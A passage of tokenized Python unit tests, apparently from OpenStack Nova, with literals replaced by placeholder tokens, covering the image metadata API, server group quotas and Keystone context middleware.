update ( { '<STR_LIT>' : dict ( id = <NUM_LIT:1> , host = '<STR_LIT>' ) } ) <EOL> DETAIL_HYPERS_DICTS [ <NUM_LIT:1> ] . update ( { '<STR_LIT>' : dict ( id = <NUM_LIT:2> , host = '<STR_LIT>' ) } ) <EOL> def _set_up_controller ( self ) : <EOL> self . ext_mgr = extensions . ExtensionManager ( ) <EOL> self . ext_mgr . extensions = { } <EOL> self . ext_mgr . extensions [ '<STR_LIT>' ] = True <EOL> self . controller = hypervisors_v2 . HypervisorsController ( self . ext_mgr ) </s>
<s> import copy <EOL> import mock <EOL> from oslo_serialization import jsonutils <EOL> import webob <EOL> from nova . api . openstack . compute import image_metadata as image_metadata_v21 <EOL> from nova . api . openstack . compute . legacy_v2 import image_metadata <EOL> from nova import exception <EOL> from nova import test <EOL> from nova . tests . unit . api . openstack import fakes <EOL> from nova . tests . unit import image_fixtures <EOL> IMAGE_FIXTURES = image_fixtures . get_image_fixtures ( ) <EOL> CHK_QUOTA_STR = '<STR_LIT>' <EOL> def get_image_123 ( ) : <EOL> return copy . deepcopy ( IMAGE_FIXTURES ) [ <NUM_LIT:0> ] <EOL> class ImageMetaDataTestV21 ( test . NoDBTestCase ) : <EOL> controller_class = image_metadata_v21 . ImageMetadataController <EOL> invalid_request = exception . ValidationError <EOL> def setUp ( self ) : <EOL> super ( ImageMetaDataTestV21 , self ) . setUp ( ) <EOL> self . controller = self . controller_class ( ) <EOL> @ mock . patch ( '<STR_LIT>' , return_value = get_image_123 ( ) ) <EOL> def test_index ( self , get_all_mocked ) : <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' ) <EOL> res_dict = self . controller . index ( req , '<STR_LIT>' ) <EOL> expected = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } <EOL> self . assertEqual ( res_dict , expected ) <EOL> get_all_mocked . assert_called_once_with ( mock . ANY , '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' , return_value = get_image_123 ( ) ) <EOL> def test_show ( self , get_mocked ) : <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' ) <EOL> res_dict = self . controller . show ( req , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertIn ( '<STR_LIT>' , res_dict ) <EOL> self . assertEqual ( len ( res_dict [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( '<STR_LIT>' , res_dict [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> get_mocked . assert_called_once_with ( mock . ANY , '<STR_LIT>' ) <EOL> @ mock . 
patch ( '<STR_LIT>' , return_value = get_image_123 ( ) ) <EOL> def test_show_not_found ( self , _get_mocked ) : <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' ) <EOL> self . assertRaises ( webob . exc . HTTPNotFound , <EOL> self . controller . show , req , '<STR_LIT>' , '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' , <EOL> side_effect = exception . ImageNotFound ( image_id = '<STR_LIT:100>' ) ) <EOL> def test_show_image_not_found ( self , _get_mocked ) : <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' ) <EOL> self . assertRaises ( webob . exc . HTTPNotFound , <EOL> self . controller . show , req , '<STR_LIT:100>' , '<STR_LIT>' ) <EOL> @ mock . patch ( CHK_QUOTA_STR ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' , return_value = get_image_123 ( ) ) <EOL> def test_create ( self , get_mocked , update_mocked , quota_mocked ) : <EOL> mock_result = copy . deepcopy ( get_image_123 ( ) ) <EOL> mock_result [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> update_mocked . return_value = mock_result <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' ) <EOL> req . method = '<STR_LIT:POST>' <EOL> body = { "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" } } <EOL> req . body = jsonutils . dump_as_bytes ( body ) <EOL> req . headers [ "<STR_LIT>" ] = "<STR_LIT:application/json>" <EOL> res = self . controller . create ( req , '<STR_LIT>' , body = body ) <EOL> get_mocked . assert_called_once_with ( mock . ANY , '<STR_LIT>' ) <EOL> expected = copy . deepcopy ( get_image_123 ( ) ) <EOL> expected [ '<STR_LIT>' ] = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> quota_mocked . assert_called_once_with ( mock . ANY , expected [ "<STR_LIT>" ] ) <EOL> update_mocked . assert_called_once_with ( mock . ANY , '<STR_LIT>' , expected , <EOL> data = None , purge_props = True ) <EOL> expected_output = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } } <EOL> self . 
assertEqual ( expected_output , res ) <EOL> @ mock . patch ( CHK_QUOTA_STR ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' , <EOL> side_effect = exception . ImageNotFound ( image_id = '<STR_LIT:100>' ) ) <EOL> def test_create_image_not_found ( self , _get_mocked , update_mocked , <EOL> quota_mocked ) : <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' ) <EOL> req . method = '<STR_LIT:POST>' <EOL> body = { "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" } } <EOL> req . body = jsonutils . dump_as_bytes ( body ) <EOL> req . headers [ "<STR_LIT>" ] = "<STR_LIT:application/json>" <EOL> self . assertRaises ( webob . exc . HTTPNotFound , <EOL> self . controller . create , req , '<STR_LIT:100>' , body = body ) <EOL> self . assertFalse ( quota_mocked . called ) <EOL> self . assertFalse ( update_mocked . called ) <EOL> @ mock . patch ( CHK_QUOTA_STR ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' , return_value = get_image_123 ( ) ) <EOL> def test_update_all ( self , get_mocked , update_mocked , quota_mocked ) : <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' ) <EOL> req . method = '<STR_LIT>' <EOL> body = { "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" } } <EOL> req . body = jsonutils . dump_as_bytes ( body ) <EOL> req . headers [ "<STR_LIT>" ] = "<STR_LIT:application/json>" <EOL> res = self . controller . update_all ( req , '<STR_LIT>' , body = body ) <EOL> get_mocked . assert_called_once_with ( mock . ANY , '<STR_LIT>' ) <EOL> expected = copy . deepcopy ( get_image_123 ( ) ) <EOL> expected [ '<STR_LIT>' ] = { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> quota_mocked . assert_called_once_with ( mock . ANY , expected [ "<STR_LIT>" ] ) <EOL> update_mocked . assert_called_once_with ( mock . ANY , '<STR_LIT>' , expected , <EOL> data = None , purge_props = True ) <EOL> expected_output = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } <EOL> self . assertEqual ( expected_output , res ) <EOL> @ mock . 
patch ( CHK_QUOTA_STR ) <EOL> @ mock . patch ( '<STR_LIT>' , <EOL> side_effect = exception . ImageNotFound ( image_id = '<STR_LIT:100>' ) ) <EOL> def test_update_all_image_not_found ( self , _get_mocked , quota_mocked ) : <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' ) <EOL> req . method = '<STR_LIT>' <EOL> body = { "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" } } <EOL> req . body = jsonutils . dump_as_bytes ( body ) <EOL> req . headers [ "<STR_LIT>" ] = "<STR_LIT:application/json>" <EOL> self . assertRaises ( webob . exc . HTTPNotFound , <EOL> self . controller . update_all , req , '<STR_LIT:100>' , body = body ) <EOL> self . assertFalse ( quota_mocked . called ) <EOL> @ mock . patch ( CHK_QUOTA_STR ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' , return_value = get_image_123 ( ) ) <EOL> def test_update_item ( self , _get_mocked , update_mocked , quota_mocked ) : <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' ) <EOL> req . method = '<STR_LIT>' <EOL> body = { "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" } } <EOL> req . body = jsonutils . dump_as_bytes ( body ) <EOL> req . headers [ "<STR_LIT>" ] = "<STR_LIT:application/json>" <EOL> res = self . controller . update ( req , '<STR_LIT>' , '<STR_LIT>' , body = body ) <EOL> expected = copy . deepcopy ( get_image_123 ( ) ) <EOL> expected [ '<STR_LIT>' ] = { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> quota_mocked . assert_called_once_with ( mock . ANY , expected [ "<STR_LIT>" ] ) <EOL> update_mocked . assert_called_once_with ( mock . ANY , '<STR_LIT>' , expected , <EOL> data = None , purge_props = True ) <EOL> expected_output = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } <EOL> self . assertEqual ( res , expected_output ) <EOL> @ mock . patch ( CHK_QUOTA_STR ) <EOL> @ mock . patch ( '<STR_LIT>' , <EOL> side_effect = exception . ImageNotFound ( image_id = '<STR_LIT:100>' ) ) <EOL> def test_update_item_image_not_found ( self , _get_mocked , quota_mocked ) : <EOL> req = fakes . 
HTTPRequest . blank ( '<STR_LIT>' ) <EOL> req . method = '<STR_LIT>' <EOL> body = { "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" } } <EOL> req . body = jsonutils . dump_as_bytes ( body ) <EOL> req . headers [ "<STR_LIT>" ] = "<STR_LIT:application/json>" <EOL> self . assertRaises ( webob . exc . HTTPNotFound , <EOL> self . controller . update , req , '<STR_LIT:100>' , '<STR_LIT>' , <EOL> body = body ) <EOL> self . assertFalse ( quota_mocked . called ) <EOL> @ mock . patch ( CHK_QUOTA_STR ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_update_item_bad_body ( self , get_mocked , update_mocked , <EOL> quota_mocked ) : <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' ) <EOL> req . method = '<STR_LIT>' <EOL> body = { "<STR_LIT>" : "<STR_LIT>" } <EOL> req . body = b'<STR_LIT>' <EOL> req . headers [ "<STR_LIT>" ] = "<STR_LIT:application/json>" <EOL> self . assertRaises ( self . invalid_request , <EOL> self . controller . update , req , '<STR_LIT>' , '<STR_LIT>' , <EOL> body = body ) <EOL> self . assertFalse ( get_mocked . called ) <EOL> self . assertFalse ( quota_mocked . called ) <EOL> self . assertFalse ( update_mocked . called ) <EOL> @ mock . patch ( CHK_QUOTA_STR , <EOL> side_effect = webob . exc . HTTPBadRequest ( ) ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_update_item_too_many_keys ( self , get_mocked , update_mocked , <EOL> _quota_mocked ) : <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' ) <EOL> req . method = '<STR_LIT>' <EOL> body = { "<STR_LIT>" : { "<STR_LIT:foo>" : "<STR_LIT:bar>" } } <EOL> req . body = jsonutils . dump_as_bytes ( body ) <EOL> req . headers [ "<STR_LIT>" ] = "<STR_LIT:application/json>" <EOL> self . assertRaises ( webob . exc . HTTPBadRequest , <EOL> self . controller . update , req , '<STR_LIT>' , '<STR_LIT>' , <EOL> body = body ) <EOL> self . assertFalse ( get_mocked . called ) <EOL> self . assertFalse ( update_mocked . 
called ) <EOL> @ mock . patch ( CHK_QUOTA_STR ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' , return_value = get_image_123 ( ) ) <EOL> def test_update_item_body_uri_mismatch ( self , _get_mocked , update_mocked , <EOL> quota_mocked ) : <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' ) <EOL> req . method = '<STR_LIT>' <EOL> body = { "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" } } <EOL> req . body = jsonutils . dump_as_bytes ( body ) <EOL> req . headers [ "<STR_LIT>" ] = "<STR_LIT:application/json>" <EOL> self . assertRaises ( webob . exc . HTTPBadRequest , <EOL> self . controller . update , req , '<STR_LIT>' , '<STR_LIT>' , <EOL> body = body ) <EOL> self . assertFalse ( quota_mocked . called ) <EOL> self . assertFalse ( update_mocked . called ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' , return_value = get_image_123 ( ) ) <EOL> def test_delete ( self , _get_mocked , update_mocked ) : <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' ) <EOL> req . method = '<STR_LIT>' <EOL> res = self . controller . delete ( req , '<STR_LIT>' , '<STR_LIT>' ) <EOL> expected = copy . deepcopy ( get_image_123 ( ) ) <EOL> expected [ '<STR_LIT>' ] = { } <EOL> update_mocked . assert_called_once_with ( mock . ANY , '<STR_LIT>' , expected , <EOL> data = None , purge_props = True ) <EOL> self . assertIsNone ( res ) <EOL> @ mock . patch ( '<STR_LIT>' , return_value = get_image_123 ( ) ) <EOL> def test_delete_not_found ( self , _get_mocked ) : <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' ) <EOL> req . method = '<STR_LIT>' <EOL> self . assertRaises ( webob . exc . HTTPNotFound , <EOL> self . controller . delete , req , '<STR_LIT>' , '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' , <EOL> side_effect = exception . ImageNotFound ( image_id = '<STR_LIT:100>' ) ) <EOL> def test_delete_image_not_found ( self , _get_mocked ) : <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' ) <EOL> req . method = '<STR_LIT>' <EOL> self . 
assertRaises ( webob . exc . HTTPNotFound , <EOL> self . controller . delete , req , '<STR_LIT:100>' , '<STR_LIT>' ) <EOL> @ mock . patch ( CHK_QUOTA_STR , <EOL> side_effect = webob . exc . HTTPForbidden ( explanation = '<STR_LIT>' ) ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' , return_value = get_image_123 ( ) ) <EOL> def test_too_many_metadata_items_on_create ( self , _get_mocked , <EOL> update_mocked , _quota_mocked ) : <EOL> body = { "<STR_LIT>" : { "<STR_LIT:foo>" : "<STR_LIT:bar>" } } <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' ) <EOL> req . method = '<STR_LIT:POST>' <EOL> req . body = jsonutils . dump_as_bytes ( body ) <EOL> req . headers [ "<STR_LIT>" ] = "<STR_LIT:application/json>" <EOL> self . assertRaises ( webob . exc . HTTPForbidden , <EOL> self . controller . create , req , '<STR_LIT>' , body = body ) <EOL> self . assertFalse ( update_mocked . called ) <EOL> @ mock . patch ( CHK_QUOTA_STR , <EOL> side_effect = webob . exc . HTTPForbidden ( explanation = '<STR_LIT>' ) ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' , return_value = get_image_123 ( ) ) <EOL> def test_too_many_metadata_items_on_put ( self , _get_mocked , <EOL> update_mocked , _quota_mocked ) : <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' ) <EOL> req . method = '<STR_LIT>' <EOL> body = { "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } } <EOL> req . body = jsonutils . dump_as_bytes ( body ) <EOL> req . headers [ "<STR_LIT>" ] = "<STR_LIT:application/json>" <EOL> self . assertRaises ( self . invalid_request , <EOL> self . controller . update , req , '<STR_LIT>' , '<STR_LIT>' , <EOL> body = body ) <EOL> self . assertFalse ( update_mocked . called ) <EOL> @ mock . patch ( '<STR_LIT>' , <EOL> side_effect = exception . ImageNotAuthorized ( image_id = '<STR_LIT>' ) ) <EOL> def test_image_not_authorized_update ( self , _get_mocked ) : <EOL> req = fakes . HTTPRequest . 
blank ( '<STR_LIT>' ) <EOL> req . method = '<STR_LIT>' <EOL> body = { "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" } } <EOL> req . body = jsonutils . dump_as_bytes ( body ) <EOL> req . headers [ "<STR_LIT>" ] = "<STR_LIT:application/json>" <EOL> self . assertRaises ( webob . exc . HTTPForbidden , <EOL> self . controller . update , req , '<STR_LIT>' , '<STR_LIT>' , <EOL> body = body ) <EOL> @ mock . patch ( '<STR_LIT>' , <EOL> side_effect = exception . ImageNotAuthorized ( image_id = '<STR_LIT>' ) ) <EOL> def test_image_not_authorized_update_all ( self , _get_mocked ) : <EOL> image_id = <NUM_LIT> <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' <EOL> % image_id ) <EOL> req . method = '<STR_LIT>' <EOL> body = { "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" } } <EOL> req . body = jsonutils . dump_as_bytes ( body ) <EOL> req . headers [ "<STR_LIT>" ] = "<STR_LIT:application/json>" <EOL> self . assertRaises ( webob . exc . HTTPForbidden , <EOL> self . controller . update_all , req , image_id , <EOL> body = body ) <EOL> @ mock . patch ( '<STR_LIT>' , <EOL> side_effect = exception . ImageNotAuthorized ( image_id = '<STR_LIT>' ) ) <EOL> def test_image_not_authorized_create ( self , _get_mocked ) : <EOL> image_id = <NUM_LIT> <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' <EOL> % image_id ) <EOL> req . method = '<STR_LIT:POST>' <EOL> body = { "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" } } <EOL> req . body = jsonutils . dump_as_bytes ( body ) <EOL> req . headers [ "<STR_LIT>" ] = "<STR_LIT:application/json>" <EOL> self . assertRaises ( webob . exc . HTTPForbidden , <EOL> self . controller . create , req , image_id , <EOL> body = body ) <EOL> class ImageMetaDataTestV2 ( ImageMetaDataTestV21 ) : <EOL> controller_class = image_metadata . Controller <EOL> invalid_request = webob . exc . HTTPBadRequest <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . 
patch ( '<STR_LIT>' , return_value = get_image_123 ( ) ) <EOL> def test_delete ( self , _get_mocked , update_mocked ) : <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' ) <EOL> req . method = '<STR_LIT>' <EOL> res = self . controller . delete ( req , '<STR_LIT>' , '<STR_LIT>' ) <EOL> expected = copy . deepcopy ( get_image_123 ( ) ) <EOL> expected [ '<STR_LIT>' ] = { } <EOL> update_mocked . assert_called_once_with ( mock . ANY , '<STR_LIT>' , expected , <EOL> data = None , purge_props = True ) <EOL> self . assertIsNone ( res ) </s>
<s> from oslo_config import cfg <EOL> from oslo_utils import uuidutils <EOL> import webob <EOL> from nova . api . openstack . compute . legacy_v2 . contrib import server_groups <EOL> from nova . api . openstack . compute import server_groups as sg_v21 <EOL> from nova . api . openstack import extensions <EOL> from nova import context <EOL> from nova import quota <EOL> from nova import test <EOL> from nova . tests . unit . api . openstack import fakes <EOL> CONF = cfg . CONF <EOL> class AttrDict ( dict ) : <EOL> def __getattr__ ( self , k ) : <EOL> return self [ k ] <EOL> def server_group_template ( ** kwargs ) : <EOL> sgroup = kwargs . copy ( ) <EOL> sgroup . setdefault ( '<STR_LIT:name>' , '<STR_LIT:test>' ) <EOL> return sgroup <EOL> def server_group_db ( sg ) : <EOL> attrs = sg . copy ( ) <EOL> if '<STR_LIT:id>' in attrs : <EOL> attrs [ '<STR_LIT>' ] = attrs . pop ( '<STR_LIT:id>' ) <EOL> if '<STR_LIT>' in attrs : <EOL> policies = attrs . pop ( '<STR_LIT>' ) <EOL> attrs [ '<STR_LIT>' ] = policies <EOL> else : <EOL> attrs [ '<STR_LIT>' ] = [ ] <EOL> if '<STR_LIT>' in attrs : <EOL> members = attrs . pop ( '<STR_LIT>' ) <EOL> attrs [ '<STR_LIT>' ] = members <EOL> else : <EOL> attrs [ '<STR_LIT>' ] = [ ] <EOL> if '<STR_LIT>' in attrs : <EOL> attrs [ '<STR_LIT>' ] = attrs . pop ( '<STR_LIT>' ) <EOL> else : <EOL> attrs [ '<STR_LIT>' ] = { } <EOL> attrs [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> attrs [ '<STR_LIT>' ] = None <EOL> attrs [ '<STR_LIT>' ] = None <EOL> attrs [ '<STR_LIT>' ] = None <EOL> if '<STR_LIT>' not in attrs : <EOL> attrs [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> if '<STR_LIT>' not in attrs : <EOL> attrs [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> attrs [ '<STR_LIT:id>' ] = <NUM_LIT:7> <EOL> return AttrDict ( attrs ) <EOL> class ServerGroupQuotasTestV21 ( test . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( ServerGroupQuotasTestV21 , self ) . setUp ( ) <EOL> self . _setup_controller ( ) <EOL> self . req = fakes . HTTPRequest . 
blank ( '<STR_LIT>' ) <EOL> def _setup_controller ( self ) : <EOL> self . controller = sg_v21 . ServerGroupController ( ) <EOL> def _setup_quotas ( self ) : <EOL> pass <EOL> def _assert_server_groups_in_use ( self , project_id , user_id , in_use ) : <EOL> ctxt = context . get_admin_context ( ) <EOL> result = quota . QUOTAS . get_user_quotas ( ctxt , project_id , user_id ) <EOL> self . assertEqual ( result [ '<STR_LIT>' ] [ '<STR_LIT>' ] , in_use ) <EOL> def test_create_server_group_normal ( self ) : <EOL> self . _setup_quotas ( ) <EOL> sgroup = server_group_template ( ) <EOL> policies = [ '<STR_LIT>' ] <EOL> sgroup [ '<STR_LIT>' ] = policies <EOL> res_dict = self . controller . create ( self . req , <EOL> body = { '<STR_LIT>' : sgroup } ) <EOL> self . assertEqual ( res_dict [ '<STR_LIT>' ] [ '<STR_LIT:name>' ] , '<STR_LIT:test>' ) <EOL> self . assertTrue ( uuidutils . is_uuid_like ( res_dict [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] ) ) <EOL> self . assertEqual ( res_dict [ '<STR_LIT>' ] [ '<STR_LIT>' ] , policies ) <EOL> def test_create_server_group_quota_limit ( self ) : <EOL> self . _setup_quotas ( ) <EOL> sgroup = server_group_template ( ) <EOL> policies = [ '<STR_LIT>' ] <EOL> sgroup [ '<STR_LIT>' ] = policies <EOL> for i in range ( CONF . quota_server_groups ) : <EOL> self . controller . create ( self . req , body = { '<STR_LIT>' : sgroup } ) <EOL> self . assertRaises ( webob . exc . HTTPForbidden , <EOL> self . controller . create , <EOL> self . req , body = { '<STR_LIT>' : sgroup } ) <EOL> def test_delete_server_group_by_admin ( self ) : <EOL> self . _setup_quotas ( ) <EOL> sgroup = server_group_template ( ) <EOL> policies = [ '<STR_LIT>' ] <EOL> sgroup [ '<STR_LIT>' ] = policies <EOL> res = self . controller . create ( self . req , body = { '<STR_LIT>' : sgroup } ) <EOL> sg_id = res [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> context = self . req . environ [ '<STR_LIT>' ] <EOL> self . _assert_server_groups_in_use ( context . project_id , <EOL> context . 
user_id , <NUM_LIT:1> ) <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' , use_admin_context = True ) <EOL> self . controller . delete ( req , sg_id ) <EOL> self . _assert_server_groups_in_use ( context . project_id , <EOL> context . user_id , <NUM_LIT:0> ) <EOL> def test_delete_server_group_by_id ( self ) : <EOL> self . _setup_quotas ( ) <EOL> sg = server_group_template ( id = '<STR_LIT>' ) <EOL> self . called = False <EOL> def server_group_delete ( context , id ) : <EOL> self . called = True <EOL> def return_server_group ( context , group_id ) : <EOL> self . assertEqual ( sg [ '<STR_LIT:id>' ] , group_id ) <EOL> return server_group_db ( sg ) <EOL> self . stub_out ( '<STR_LIT>' , <EOL> server_group_delete ) <EOL> self . stub_out ( '<STR_LIT>' , <EOL> return_server_group ) <EOL> resp = self . controller . delete ( self . req , '<STR_LIT>' ) <EOL> self . assertTrue ( self . called ) <EOL> if isinstance ( self . controller , sg_v21 . ServerGroupController ) : <EOL> status_int = self . controller . delete . wsgi_code <EOL> else : <EOL> status_int = resp . status_int <EOL> self . assertEqual ( <NUM_LIT> , status_int ) <EOL> class ServerGroupQuotasTestV2 ( ServerGroupQuotasTestV21 ) : <EOL> def _setup_controller ( self ) : <EOL> self . ext_mgr = self . mox . CreateMock ( extensions . ExtensionManager ) <EOL> self . controller = server_groups . ServerGroupController ( self . ext_mgr ) <EOL> def _setup_quotas ( self ) : <EOL> self . ext_mgr . is_loaded ( '<STR_LIT>' ) . MultipleTimes ( ) . AndReturn ( True ) <EOL> self . mox . ReplayAll ( ) </s>
<s> from oslo_config import cfg <EOL> from oslo_middleware import request_id <EOL> from oslo_serialization import jsonutils <EOL> import webob <EOL> import webob . exc <EOL> import nova . api . auth <EOL> from nova import test <EOL> CONF = cfg . CONF <EOL> class TestNovaKeystoneContextMiddleware ( test . NoDBTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestNovaKeystoneContextMiddleware , self ) . setUp ( ) <EOL> @ webob . dec . wsgify ( ) <EOL> def fake_app ( req ) : <EOL> self . context = req . environ [ '<STR_LIT>' ] <EOL> return webob . Response ( ) <EOL> self . context = None <EOL> self . middleware = nova . api . auth . NovaKeystoneContext ( fake_app ) <EOL> self . request = webob . Request . blank ( '<STR_LIT:/>' ) <EOL> self . request . headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . request . headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . request . headers [ '<STR_LIT>' ] = jsonutils . dumps ( { } ) <EOL> def test_no_user_or_user_id ( self ) : <EOL> response = self . request . get_response ( self . middleware ) <EOL> self . assertEqual ( response . status , '<STR_LIT>' ) <EOL> def test_user_id_only ( self ) : <EOL> self . request . headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> response = self . request . get_response ( self . middleware ) <EOL> self . assertEqual ( response . status , '<STR_LIT>' ) <EOL> self . assertEqual ( self . context . user_id , '<STR_LIT>' ) <EOL> def test_user_only ( self ) : <EOL> self . request . headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> response = self . request . get_response ( self . middleware ) <EOL> self . assertEqual ( response . status , '<STR_LIT>' ) <EOL> self . assertEqual ( self . context . user_id , '<STR_LIT>' ) <EOL> def test_user_id_trumps_user ( self ) : <EOL> self . request . headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . request . headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> response = self . request . get_response ( self . middleware ) <EOL> self . assertEqual ( response . 
status , '<STR_LIT>' ) <EOL> self . assertEqual ( self . context . user_id , '<STR_LIT>' ) <EOL> def test_invalid_service_catalog ( self ) : <EOL> self . request . headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . request . headers [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> response = self . request . get_response ( self . middleware ) <EOL> self . assertEqual ( response . status , '<STR_LIT>' ) <EOL> def test_request_id_extracted_from_env ( self ) : <EOL> req_id = '<STR_LIT>' <EOL> self . request . headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . request . headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . request . environ [ request_id . ENV_REQUEST_ID ] = req_id <EOL> self . request . get_response ( self . middleware ) <EOL> self . assertEqual ( req_id , self . context . request_id ) <EOL> class TestKeystoneMiddlewareRoles ( test . NoDBTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestKeystoneMiddlewareRoles , self ) . setUp ( ) <EOL> @ webob . dec . wsgify ( ) <EOL> def role_check_app ( req ) : <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> if "<STR_LIT>" in context . roles and "<STR_LIT>" not in context . roles : <EOL> return webob . Response ( status = "<STR_LIT>" ) <EOL> elif context . roles == [ '<STR_LIT>' ] : <EOL> return webob . Response ( status = "<STR_LIT>" ) <EOL> else : <EOL> raise webob . exc . HTTPBadRequest ( "<STR_LIT>" ) <EOL> self . middleware = nova . api . auth . NovaKeystoneContext ( role_check_app ) <EOL> self . request = webob . Request . blank ( '<STR_LIT:/>' ) <EOL> self . request . headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . request . headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . request . headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . request . headers [ '<STR_LIT>' ] = jsonutils . dumps ( { } ) <EOL> self . roles = "<STR_LIT>" <EOL> def test_roles ( self ) : <EOL> self . request . headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> response = self . request . get_response ( self . middleware ) <EOL> self . 
assertEqual ( response . status , '<STR_LIT>' ) <EOL> def test_roles_empty ( self ) : <EOL> self . request . headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> response = self . request . get_response ( self . middleware ) <EOL> self . assertEqual ( response . status , '<STR_LIT>' ) <EOL> def test_no_role_headers ( self ) : <EOL> response = self . request . get_response ( self . middleware ) <EOL> self . assertEqual ( response . status , '<STR_LIT>' ) <EOL> class TestPipeLineFactory ( test . NoDBTestCase ) : <EOL> class FakeFilter ( object ) : <EOL> def __init__ ( self , name ) : <EOL> self . name = name <EOL> self . obj = None <EOL> def __call__ ( self , obj ) : <EOL> self . obj = obj <EOL> return self <EOL> class FakeApp ( object ) : <EOL> def __init__ ( self , name ) : <EOL> self . name = name <EOL> class FakeLoader ( object ) : <EOL> def get_filter ( self , name ) : <EOL> return TestPipeLineFactory . FakeFilter ( name ) <EOL> def get_app ( self , name ) : <EOL> return TestPipeLineFactory . FakeApp ( name ) <EOL> def _test_pipeline ( self , pipeline , app ) : <EOL> for p in pipeline . split ( ) [ : - <NUM_LIT:1> ] : <EOL> self . assertEqual ( app . name , p ) <EOL> self . assertIsInstance ( app , TestPipeLineFactory . FakeFilter ) <EOL> app = app . obj <EOL> self . assertEqual ( app . name , pipeline . split ( ) [ - <NUM_LIT:1> ] ) <EOL> self . assertIsInstance ( app , TestPipeLineFactory . FakeApp ) <EOL> def test_pipeline_factory ( self ) : <EOL> fake_pipeline = '<STR_LIT>' 